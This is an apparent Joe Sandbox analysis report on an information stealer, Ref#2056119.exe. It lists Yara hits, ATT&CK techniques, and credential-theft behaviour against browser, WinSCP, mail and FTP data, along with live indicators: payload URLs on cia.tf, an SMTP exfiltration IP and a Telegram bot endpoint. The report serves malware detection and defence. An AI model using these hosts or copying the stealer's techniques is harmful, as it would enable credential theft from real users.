                      Source: Yara matchFile source: 00000005.00000002.3115674716.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3116067900.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3115674716.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#2056119.exe PID: 7496, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ref#2056119.exe PID: 7912, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 7236, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 4588, type: MEMORYSTR
                      Source: Yara matchFile source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Liphmahu.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: 8.2.Liphmahu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Liphmahu.exe.25f81a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Liphmahu.exe.25f81a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Liphmahu.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Liphmahu.exe PID: 6104, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#2056119.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\ishon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\ishon.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\ishon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ishon.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ishon.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ishon.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\Desktop\Ref#2056119.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ishon.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ishon.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\ishon.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\ishon.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 5.2.Ref#2056119.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#2056119.exe.3f8cd58.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.ishon.exe.43fe2e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.ishon.exe.43fe2e0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3116067900.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3115674716.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#2056119.exe PID: 7496, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ref#2056119.exe PID: 7912, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 7236, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 4588, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 5.2.Ref#2056119.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#2056119.exe.3f8cd58.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.ishon.exe.43fe2e0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.ishon.exe.43fe2e0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3115674716.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3116067900.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3116067900.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3116067900.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3115674716.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3115674716.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3116067900.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3115674716.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#2056119.exe PID: 7496, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Ref#2056119.exe PID: 7912, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 7236, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ishon.exe PID: 4588, type: MEMORYSTR
                      Source: Yara matchFile source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Liphmahu.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: 8.2.Liphmahu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Liphmahu.exe.25f81a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Liphmahu.exe.25f81a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Liphmahu.exe PID: 7852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Liphmahu.exe PID: 6104, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting
                      Valid Accounts121
                      Windows Management Instrumentation
                      111
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      2
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      DLL Side-Loading
                      111
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Credentials in Registry
                      25
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      2
                      Obfuscated Files or Information
                      Security Account Manager1
                      Query Registry
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron2
                      Registry Run Keys / Startup Folder
                      2
                      Registry Run Keys / Startup Folder
                      1
                      Software Packing
                      NTDS321
                      Security Software Discovery
                      Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets1
                      Process Discovery
                      SSHKeylogging123
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials151
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection
                      Proc Filesystem1
                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562370 Sample: Ref#2056119.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 43 cia.tf 2->43 45 api.ipify.org 2->45 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 14 other signatures 2->67 9 Ref#2056119.exe 15 7 2->9         started        14 wscript.exe 1 2->14         started        signatures3 process4 dnsIp5 47 cia.tf 172.67.129.178, 443, 49737, 49739 CLOUDFLARENETUS United States 9->47 31 C:\Users\user\AppData\Roaming\ishon.exe, PE32 9->31 dropped 33 C:\Users\user\AppData\Local\...\Liphmahu.exe, PE32 9->33 dropped 35 C:\Users\user\...\ishon.exe:Zone.Identifier, ASCII 9->35 dropped 37 C:\Users\user\AppData\Roaming\...\ishon.vbs, ASCII 9->37 dropped 77 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 9->77 79 Drops VBS files to the startup folder 9->79 81 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->81 83 Injects a PE file into a foreign processes 9->83 16 Ref#2056119.exe 2 9->16         started        20 Liphmahu.exe 14 2 9->20         started        85 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->85 22 ishon.exe 14->22         started        file6 signatures7 process8 dnsIp9 39 162.254.34.31, 49743, 49757, 587 VIVIDHOSTINGUS United States 16->39 41 api.ipify.org 104.26.13.205, 443, 49740, 49750 CLOUDFLARENETUS United States 16->41 49 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->49 51 Tries to steal Mail credentials (via file / registry access) 16->51 53 Injects a PE file into a foreign processes 20->53 24 Liphmahu.exe 20->24         started        55 Multi AV Scanner detection for dropped file 22->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 22->57 59 Machine Learning detection for dropped file 22->59 26 ishon.exe 22->26         started        signatures10 process11 signatures12 29 WerFault.exe 24->29         started        69 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 26->69 71 Tries to steal Mail credentials (via file / registry access) 26->71 73 Tries to harvest and steal ftp login credentials 26->73 75 Tries to harvest and steal browser information (history, passwords, etc) 26->75 process13

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Ref#2056119.exe37%ReversingLabs
                      Ref#2056119.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\ishon.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\Liphmahu.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ishon.exe37%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      89.40.31.2320%Avira URL Cloudsafe
                      https://cia.tf0%Avira URL Cloudsafe
                      https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdf0%Avira URL Cloudsafe
                      https://cia.tf/417440cce6502c1c57308172e9826dec.mp4HI0%Avira URL Cloudsafe
                      https://cia.tf/417440cce6502c1c57308172e9826dec.mp40%Avira URL Cloudsafe
                      https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdfHI=0%Avira URL Cloudsafe
                      https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdfHI0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      cia.tf
                      172.67.129.178
                      truefalse
                        unknown
                        api.ipify.org
                        104.26.13.205
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://cia.tf/417440cce6502c1c57308172e9826dec.mp4false
                          • Avira URL Cloud: safe
                          unknown
                          https://api.ipify.org/false
                            high
                            https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdffalse
                            • Avira URL Cloud: safe
                            unknown
                            89.40.31.232true
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tRef#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drfalse
                              high
                              https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdfHI=ishon.exe, 00000007.00000002.2307141750.00000000030D1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://api.ipify.orgRef#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://sectigo.com/CPS0Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drfalse
                                  high
                                  https://github.com/mgravell/protobuf-netiRef#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://stackoverflow.com/q/14436606/23354Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://account.dyn.com/Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/mgravell/protobuf-netJRef#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.0000000004149000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004440000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://ocsp.sectigo.com0Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drfalse
                                            high
                                            https://api.telegram.org/botLiphmahu.exe, 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              high
                                              https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdfHIRef#2056119.exe, 00000000.00000002.2031085237.0000000002E41000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://stackoverflow.com/q/11564914/23354;Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://stackoverflow.com/q/2152978/23354Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drfalse
                                                    high
                                                    https://github.com/mgravell/protobuf-netRef#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://cia.tfRef#2056119.exe, 00000000.00000002.2031085237.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.00000000030D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.microsoft.Liphmahu.exe, 00000004.00000002.2209273870.00000000060D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://api.ipify.org/tRef#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://cia.tf/417440cce6502c1c57308172e9826dec.mp4HILiphmahu.exe, 00000004.00000002.2192763422.00000000024A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRef#2056119.exe, 00000000.00000002.2031085237.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            172.67.129.178
                                                            cia.tfUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.26.13.205
                                                            api.ipify.orgUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            162.254.34.31
                                                            unknownUnited States
                                                            64200VIVIDHOSTINGUStrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1562370
                                                            Start date and time:2024-11-25 14:46:09 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 55s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:14
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Ref#2056119.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winEXE@13/4@2/3
                                                            EGA Information:
                                                            • Successful, ratio: 83.3%
                                                            HCA Information:
                                                            • Successful, ratio: 96%
                                                            • Number of executed functions: 452
                                                            • Number of non-executed functions: 38
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target Liphmahu.exe, PID 6104 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: Ref#2056119.exe
                                                            TimeTypeDescription
                                                            08:47:20API Interceptor79x Sleep call for process: Ref#2056119.exe modified
                                                            08:47:37API Interceptor31x Sleep call for process: Liphmahu.exe modified
                                                            08:47:48API Interceptor74x Sleep call for process: ishon.exe modified
                                                            13:47:39AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                            • api.ipify.org/
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • api.ipify.org/
                                                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                            • api.ipify.org/
                                                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                            • api.ipify.org/
                                                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                            • api.ipify.org/
                                                            Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                            • api.ipify.org/
                                                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                            • api.ipify.org/
                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                            • api.ipify.org/
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • api.ipify.org/
                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                            • api.ipify.org/
                                                            162.254.34.31Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                              Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                  Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                    SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                      D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                        Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                          Ref#150689.vbeGet hashmaliciousAgentTeslaBrowse
                                                                            Request for Best Price Offer.exeGet hashmaliciousAgentTeslaBrowse
                                                                              EQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                api.ipify.orgPO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                • 104.26.13.205
                                                                                CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 104.26.12.205
                                                                                New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 172.67.74.152
                                                                                DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 172.67.74.152
                                                                                https://linktr.ee/priyanka662Get hashmaliciousGabagoolBrowse
                                                                                • 172.67.74.152
                                                                                mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                                • 172.67.74.152
                                                                                zapret.exeGet hashmaliciousUnknownBrowse
                                                                                • 104.26.13.205
                                                                                313e4225be01a2f968dd52e4e8c0b9fd08c906289779b.exeGet hashmaliciousUnknownBrowse
                                                                                • 104.26.13.205
